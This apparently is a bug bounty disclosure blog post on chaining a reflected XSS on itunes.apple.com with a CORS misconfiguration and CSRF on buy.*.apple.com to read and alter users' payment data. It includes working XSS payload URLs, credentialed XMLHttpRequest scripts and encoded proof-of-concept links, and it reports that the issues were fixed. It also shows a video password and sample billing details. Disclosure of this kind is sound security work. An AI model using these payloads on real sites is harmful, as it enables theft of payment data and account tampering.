Apple - Steal Payment Data and Full access to payment actions of any Apple Account in multiple services By Chaining CORS and XSS [7500$]

-
Company Information : 

Apple Inc. is an American multinational technology company headquartered in Cupertino, California. As of March 2023, Apple is the world's biggest company by market capitalization, and with US$394.3 billion the largest technology company by 2022 revenue.


Bug Category : 
Cross-origin resource sharing (CORS) :
Cross-origin resource sharing (CORS) is a mechanism that allows restricted resources on a web page to be accessed from another domain outside the domain from which the first resource was served. A web page may freely embed cross-origin images, stylesheets, scripts, iframes, and videos.


Stored Cross-site-scripting (XSS) :
Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it.


##Impact :

I am mentioning a few examples below. 

1.Access to Payment Data like credit card , Billing Address etc. 

2.Add/Edit/Delete credit cards and billing/shipping address

3.Force user to Get the subscription 

4.Cancel Current subscriptions of user




Target  Information : 

https://music.apple.com

https://tv.apple.com 

https://iTunes.apple.com

https://podcastsconnect.apple.com

https://buy.*.apple.com 

https://buy.music.apple.com

https://buy.tv.apple.com

https://buy.itunes.apple.com

https://buy.podcastsconnect.apple.com



Technical Details of the Bug : 

1.Reflected XSS on https://itunes.apple.com 

I found a Reflected XSS on https://itunes.apple.com . Mentioning the POC below. 

POC : 

https://itunes.apple.com/essentials?id="><svg/onload=alert(document.domain)>

https://itunes.apple.com/essentials?id="><svg/onload=alert(document.cookie)>

I am also attaching a screenshot. 

Screenshot 2021-06-06 at 12.12.31 PM.png




2.CORS Misconfiguration :

When we Access few domains like music.apple.com , tv.apple.com  , iTunes.apple.com , podcastsconnect.apple.com etc. 

For All payment related data and actions , below mentioned domain runs in background .

Vulnerable Domain :

buy.music.apple.com

buy.tv.apple.com

buy.itunes.apple.com

buy.podcastsconnect.apple.com

Above mentioned all domains are similar in behaviour but the domain name is different based on where it's being used.

Ex : 

For payments on tv.apple.com , the used domain will be buy.tv.apple.com 



There is a CORS implementation in all domains  https://buy.*.apple.com 

This CORS policies are very strict as  domain outside the apple.com is allowed . No subdomain of apple.com is also not allowed.

After testing , I found below domains are allowed .

*.music.apple.com

*.tv.apple.com

Apart from that I found https://itunes.apple.com was allowed as a valid domain and user can make GET/POST requests from

https://itunes.apple.com.


POC :

1.Login to https://music.apple.com and go to settings.

2.Capture the background traffic in the proxy tool.

3.You will notice requests with domain https://buy.music.apple.com

4.Capture any request and send it to repeater(Ex: in burp suite)

5.Add Origin: https://itunes.apple.com Header and run the request.

6.You will notice that the Header will be accepted and reflects back with 

Access-Control-Allow-Credentials: true header. 

Same will be applied on all the below  mentioned domains :

 https://tv.apple.com  

https://podcastsconnect.apple.com

Screenshot 2021-06-06 at 12.40.22 PM.png






CSRF on https://buy.*.apple.com  :

The https://buy.*.apple.com is not only used for data access but it's also used for many critical Actions like 

Add/Edit credit cards or payment methods, Buy a subscription , Cancel subscription  etc.

All the POST requests are only protected by Strict origin header validation(explained above) and Content-Type header validation.

Hence If we make requests from any valid Origin and CSRF will be bypassed. 




Chaining all Three Attacks : 

As explained above in each section. https://itunes.apple.com is valid domain for CORS in https://buy.*.apple.com .

Hence XSS on https://itunes.apple.com leads to Access data and make requests from https://buy.*.apple.com .

Hence Now Attacker can run malicious javascript code on https://itunes.apple.com  and Access payment related data 

and actions from https://buy.*.apple.com  on victim account




##Steps to reproduce and POCs :

I am taking https://music.apple.com and https://buy.music.apple.com for POC purpose . You can also take 

https://tv.apple.com and https://podcastsconnect.apple.com to reproduce this issue.


How to capture below mentioned requests :

1.Login to https://music.apple.com  and go to settings.

2.Now check the background requests in burp suite or any other proxy tool.



I am going to mention few requests , AJAX Code for Attack and Direct POC URLs below .


Get Basic Payment and credit card info of any user :

Vulnerable HTTP request :

```

GET /account/stackable/paymentInfos HTTP/1.1

Host: buy.music.apple.com

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:87.0) Gecko/20100101 Firefox/87.0

Accept: */*

Accept-Language: en-gb

Accept-Encoding: gzip, deflate

Referer: https://music.apple.com/

content-type: application/json

x-apple-store-front: 143467-2,8

Origin: https://music.apple.com

Connection: close

Cookie: [cookies]

```


AJAX Request :

<script>

   var xhttp = new XMLHttpRequest();

   xhttp.onreadystatechange = function() {

     if (this.readyState == 4 && this.status == 200) {

   alert(this.responseText);

     }

   };

   xhttp.open("GET", "https://buy.music.apple.com/account/stackable/paymentInfos", true);

   xhttp.withCredentials = true;

   xhttp.send();

</script>


URL Encoded POC URL :

https://itunes.apple.com/essentials?id=">%3Cscript%3E%0A%20%20%20var%20xhttp%20%3D%20new%20XMLHttpRequest()%3B%0A%20%20%20xhttp.onreadystatechange%20%3D%20function()%20%7B%0A%20%20%20%20%20if%20(this.readyState%20%3D%3D%204%20%26%26%20this.status%20%3D%3D%20200)%20%7B%0A%20%20%20alert(this.responseText)%3B%0A%20%20%20%20%20%7D%0A%20%20%20%7D%3B%0A%20%20%20xhttp.open(%22GET%22%2C%20%22https%3A%2F%2Fbuy.music.apple.com%2Faccount%2Fstackable%2FpaymentInfos%22%2C%20true)%3B%0A%20%20%20xhttp.withCredentials%20%3D%20true%3B%0A%20%20%20xhttp.send()%3B%0A%3C%2Fscript%3E




PII and Payment Details : 

Vulnerable HTTP request :

```

POST /account/information/sections HTTP/1.1

Host: buy.music.apple.com

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:87.0) Gecko/20100101 Firefox/87.0

Accept: */*

Accept-Language: en-gb

Accept-Encoding: gzip, deflate

Referer: https://music.apple.com/

content-type: application/json

x-apple-store-front: 143467-2,8

Origin: https://music.apple.com

Content-Length: 49

Connection: close

Cookie: [Cookies]


{"sections":["accountSummary","purchaseHistory"]}

```

AJAX Request :

<script>

   var xhttp = new XMLHttpRequest();

   xhttp.onreadystatechange = function() {

   if (this.readyState == 4 && this.status == 200) {

   alert(this.responseText);

   }

   };

   xhttp.open("POST", "https://buy.music.apple.com/account/information/sections", true);

   xhttp.setRequestHeader("Content-Type", "application/json");

   var data=JSON.stringify({"sections":["accountSummary","purchaseHistory","xCardBalance","accountAccess","iTunesInTheCloud","familySharing","computerAuthorizations","settings"]});

   xhttp.withCredentials = true;

   xhttp.send(data);

</script>

URL Encoded POC URL :

https://itunes.apple.com/essentials?id=">%3Cscript%3E%0A%20%20%20var%20xhttp%20%3D%20new%20XMLHttpRequest()%3B%0A%20%20%20xhttp.onreadystatechange%20%3D%20function()%20%7B%0A%20%20%20if%20(this.readyState%20%3D%3D%204%20%26%26%20this.status%20%3D%3D%20200)%20%7B%0A%20%20%20alert(this.responseText)%3B%0A%20%20%20%7D%0A%20%20%20%7D%3B%0A%20%20%20xhttp.open(%22POST%22%2C%20%22https%3A%2F%2Fbuy.music.apple.com%2Faccount%2Finformation%2Fsections%22%2C%20true)%3B%0A%20%20%20xhttp.setRequestHeader(%22Content-Type%22%2C%20%22application%2Fjson%22)%3B%0A%20%20%20var%20data%3DJSON.stringify(%7B%22sections%22%3A%5B%22accountSummary%22%2C%22purchaseHistory%22%2C%22xCardBalance%22%2C%22accountAccess%22%2C%22iTunesInTheCloud%22%2C%22familySharing%22%2C%22computerAuthorizations%22%2C%22settings%22%5D%7D)%3B%0A%20%20%20xhttp.withCredentials%20%3D%20true%3B%0A%20%20%20xhttp.send(data)%3B%0A%3C%2Fscript%3E



Vulnerable HTTP request :

GET /account/web/infoRefresh HTTP/1.1

Host: buy.music.apple.com

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:87.0) Gecko/20100101 Firefox/87.0

Accept: */*

Accept-Language: en-gb

Accept-Encoding: gzip, deflate

Referer: https://music.apple.com/

content-type: application/json

x-apple-store-front: 143467-2,8

Origin: https://music.apple.com

Connection: close

Cookie: [cookies]


Ajax Request : 

   <script>

       var xhttp = new XMLHttpRequest();

       xhttp.onreadystatechange = function() {

         if (this.readyState == 4 && this.status == 200) {

alert(this.responseText);

         }

       };

       xhttp.open("GET", "https://buy.music.apple.com/account/web/infoRefresh", true);

       xhttp.withCredentials = true;

       xhttp.send();

   </script>

URL Encoded POC URL :

https://itunes.apple.com/essentials?id=">%3Cscript%3E%0A%20%20%20%20var%20xhttp%20%3D%20new%20XMLHttpRequest()%3B%0A%20%20%20%20xhttp.onreadystatechange%20%3D%20function()%20%7B%0A%20%20%20%20%20%20if%20(this.readyState%20%3D%3D%204%20%26%26%20this.status%20%3D%3D%20200)%20%7B%0A%20%20%20alert(this.responseText)%3B%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%3B%0A%20%20%20%20xhttp.open(%22GET%22%2C%20%22https%3A%2F%2Fbuy.music.apple.com%2Faccount%2Fweb%2FinfoRefresh%22%2C%20true)%3B%0A%20%20%20%20xhttp.withCredentials%20%3D%20true%3B%0A%20%20%20%20xhttp.send()%3B%0A%3C%2Fscript%3E




Update credit card and Billing Details of any user : 

Edit the payment card and this request will occur. 

Vulnerable HTTP request :

```

POST /WebObjects/MZFinance.woa/wa/editBillingInfoSrv HTTP/1.1

Host: buy.music.apple.com

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:87.0) Gecko/20100101 Firefox/87.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://music.apple.com/

content-type: application/x-www-form-urlencoded;charset=UTF-8

Origin: https://music.apple.com

Content-Length: 679

Connection: close

Cookie: [cookies]



POST Parameters here

```


Ajax Request : 

<script>

   var xhttp = new XMLHttpRequest();

   xhttp.onreadystatechange = function() {

   if (this.readyState == 4 && this.status == 200) {

   alert(this.responseText);

   }

   };

   xhttp.open("POST", "https://buy.music.apple.com/WebObjects/MZFinance.woa/wa/editBillingInfoSrv", true);

   xhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;charset=UTF-8");

   var data="storefront=IND&billingFirstName=vijay&billingLastName=kumar&addressOfficialLineFirst=Hacked&addressOfficialLineSecond=Hacked&addressOfficialLineThird=Hacked&addressOfficialCity=Hacked&addressOfficialStateProvince=KA&addressOfficialPostalCode=560103&addressOfficialCountryCode=IND&phoneOfficeNumber=7229884843&paymentMethodType=CreditCard&creditCardNumber=%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%20%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%20%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%208774&creditCardExpirationMonth=%E2%80%A2%E2%80%A2&creditCardExpirationYear=%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2&creditVerificationNumber=844&last4CCDigits=8774&creditCardType=Visa";

   xhttp.withCredentials = true;

   xhttp.send(data);

</script>


URL Encoded POC URL :

https://itunes.apple.com/essentials?id=">%3Cscript%3E%0A%20%20%20var%20xhttp%20%3D%20new%20XMLHttpRequest()%3B%0A%20%20%20xhttp.onreadystatechange%20%3D%20function()%20%7B%0A%20%20%20if%20(this.readyState%20%3D%3D%204%20%26%26%20this.status%20%3D%3D%20200)%20%7B%0A%20%20%20alert(this.responseText)%3B%0A%20%20%20%7D%0A%20%20%20%7D%3B%0A%20%20%20xhttp.open(%22POST%22%2C%20%22https%3A%2F%2Fbuy.music.apple.com%2FWebObjects%2FMZFinance.woa%2Fwa%2FeditBillingInfoSrv%22%2C%20true)%3B%0A%20%20%20xhttp.setRequestHeader(%22Content-Type%22%2C%20%22application%2Fx-www-form-urlencoded%3Bcharset%3DUTF-8%22)%3B%0A%20%20%20var%20data%3D%22storefront%3DIND%26billingFirstName%3Dvijay%26billingLastName%3Dkumar%26addressOfficialLineFirst%3DHacked%26addressOfficialLineSecond%3DHacked%26addressOfficialLineThird%3DHacked%26addressOfficialCity%3DHacked%26addressOfficialStateProvince%3DKA%26addressOfficialPostalCode%3D560103%26addressOfficialCountryCode%3DIND%26phoneOfficeNumber%3D7229884843%26paymentMethodType%3DCreditCard%26creditCardNumber%3D%25E2%2580%25A2%25E2%2580%25A2%25E2%2580%25A2%25E2%2580%25A2%2520%25E2%2580%25A2%25E2%2580%25A2%25E2%2580%25A2%25E2%2580%25A2%2520%25E2%2580%25A2%25E2%2580%25A2%25E2%2580%25A2%25E2%2580%25A2%25208774%26creditCardExpirationMonth%3D%25E2%2580%25A2%25E2%2580%25A2%26creditCardExpirationYear%3D%25E2%2580%25A2%25E2%2580%25A2%25E2%2580%25A2%25E2%2580%25A2%26creditVerificationNumber%3D844%26last4CCDigits%3D8774%26creditCardType%3DVisa%22%3B%0A%20%20%20xhttp.withCredentials%20%3D%20true%3B%0A%20%20%20xhttp.send(data)%3B%0A%3C%2Fscript%3E




#Video Proof of concept :

I am attaching Vimeo password protected video.

Link : https://vimeo.com/559574933

Password : h1test1110@





#Effected Service :

https://music.apple.com

https://tv.apple.com 

https://iTunes.apple.com

https://podcastsconnect.apple.com

https://buy.*.apple.com 

https://buy.music.apple.com

https://buy.tv.apple.com

https://buy.itunes.apple.com

https://buy.podcastsconnect.apple.com




Timeline : 



June 21th 2021: Report send to Apple product Security Team through Email.

June 21th 2021 : Report Accepted and Triaged.

June 22th 2021 : Partial Fix was released to break the full chain. 

Nov 14th 2021 : Complete issue was resolved and confirmed.

Dec 06th 2021 : 7500$ Bounty Rewarded

Comments

Post a Comment

Popular posts from this blog

Account Takeover Apple App Store Connect Account of Any user and Steal Developer API/Subscription Keys of any user(CORS+XSS) worth 8500$

-
Image
Company Information :  Apple Inc. is an American multinational technology company headquartered in Cupertino, California. As of March 2023, Apple is the world's biggest company by market capitalization, and with US$394.3 billion the largest technology company by 2022 revenue. Bug Category :  Cross-origin resource sharing (CORS) : Cross-origin resource sharing (CORS) is a mechanism that allows restricted resources on a web page to be accessed from another domain outside the domain from which the first resource was served. A web page may freely embed cross-origin images, stylesheets, scripts, iframes, and videos. Stored Cross-site-scripting (XSS) : Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it. Impact : 1.Stealing  App Store connect API key with Full Access , Subs...
Read more

Amazon Web Services : Takeover Workbook and delete the Owner on https://builder.honeycode.aws by collaborator user (IDOR) worth 7200$

-
Image
  Company Information :  Amazon Web Services, Inc. is a subsidiary of Amazon that provides on-demand cloud computing platforms and APIs to individuals, companies, and governments, on a metered, pay-as-you-go basis. Clients will often use this in combination with autoscaling. Bug Category :  Insecure direct object reference(IDOR ) :  Insecure direct object reference is a type of access control vulnerability in digital security. This can occur when a web application or application programming interface uses an identifier for direct access to an object in an internal database but does not check for access control or authentication. Target  Information :  https://builder.honeycode.aws/ Technical Details of the Bug :  On https://builder.honeycode.aws you can add workbook and add users as collaborator. collaborator have limited access to the functionalities and sharing part. But there is a way which can lead to collaborator to demote the owner , remove him ...
Read more

UnAuth Access to Twitter Private Tweets and messages Media Content Access(IDOR)

-
Image
Company Info : Twitter is an online news and social networking service where users post and interact with messages, "tweets", restricted to 140 characters. Registered users can post tweets, but those who are unregistered can only read them. Users access Twitter through its website interface, SMS or a mobile device app.Twitter Inc. is based in San Francisco, California, United States, and has more than 25 offices around the world. Bug category : Indirect Object Reference(IDOR) Link : https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References Technical Details of the Bug :  Applications frequently use the actual name or key of an object when generating web pages. Applications don’t always verify the user is authorized for the target object. This results in an insecure direct object reference flaw. Testers can easily manipulate parameter values to detect such flaws. Code analysis quickly shows whether authorization is properly verified. Bug Des...
Read more